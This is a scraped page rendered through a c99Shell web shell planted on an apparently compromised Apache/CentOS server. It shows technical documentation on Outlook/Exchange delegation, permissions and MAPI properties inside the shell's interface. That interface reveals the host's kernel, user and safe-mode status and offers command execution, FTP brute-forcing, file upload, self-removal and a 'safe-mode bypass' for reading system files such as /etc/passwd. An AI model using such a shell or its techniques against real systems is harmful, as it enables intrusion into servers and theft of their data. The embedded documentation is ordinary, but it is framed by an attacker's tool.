!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/ximian-connector/   drwxr-xr-x
Free 50.97 GB of 127.8 GB (39.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ximian-connector-delegation.html (5.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Delegation

Delegation

Delegation is a hodgepodge of several different bits of functionality. The big picture idea is "someone else deals with your mail or calendar, or you deal with theirs".

When you make someone a delegate in Outlook, the dialog lets you do a bunch of things:

  • You can edit their permissions on all of your folders in one easy place.

  • If you give them "Editor" permission on your Calendar, you can cause them to also get copies of your meeting requests.

  • If you make at least one person get copies of your meeting requests, you can make yourself not get them any more.

  • You can make it possible (on a per-delegate basis) for your delegates to be able to see "Private" appointments, contacts, and tasks in your folders. (Normally other people can't see your Private items regardless of what permissions you give them.)

  • Your delegate automatically becomes able to send mail from your address. Outlook doesn't actually allow you to enable/disable this functionality independently of calling someone a delegate, although it's possible to do so.

Different pieces of this information are stored in different places:

  1. Permissions information is stored in the security descriptors of the relevant folders. Outlook always adds the user to each of the delegatable folders (Inbox, Calendar, Contacts, Journal, Notes, and Tasks) even if they only have "None" permission there. The user is also added to the security descriptor of the "Freebusy Data" folder in the non-IPM subtree, with None or Reviewer permission if they have None or Reviewer on Calendar, and Editor permission if they have Author or Editor on Calendar.

  2. Who-can-send-mail-as-who data is kept in Active Directory. Your delegates are stored in the multivalued publicDelegates property on your AD entry. When you modify that property, AD automatically maintains back links in other entries' publicDelegatesBL properties. (Thus, by checking your own publicDelegatesBL property, you can find out who you are a delegate for.)

  3. Three multivalued MAPI properties on NON_IPM_SUBTREE/Freebusy%20Data/LocalFreebusy.EML also track your delegates:

    PR_DELEGATES_DISPLAY_NAMES

    display names of delegates
    PR_DELEGATES_ENTRYIDS

    ENTRYIDS of delegates
    PR_DELEGATES_SEE_PRIVATE

    boolean "can see private items" values

  4. Meeting request forwarding is controlled by a server-side rule in Inbox with a PR_RULE_MSG_PROVIDER of "Schedule+ EMS Interface"


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0078 ]--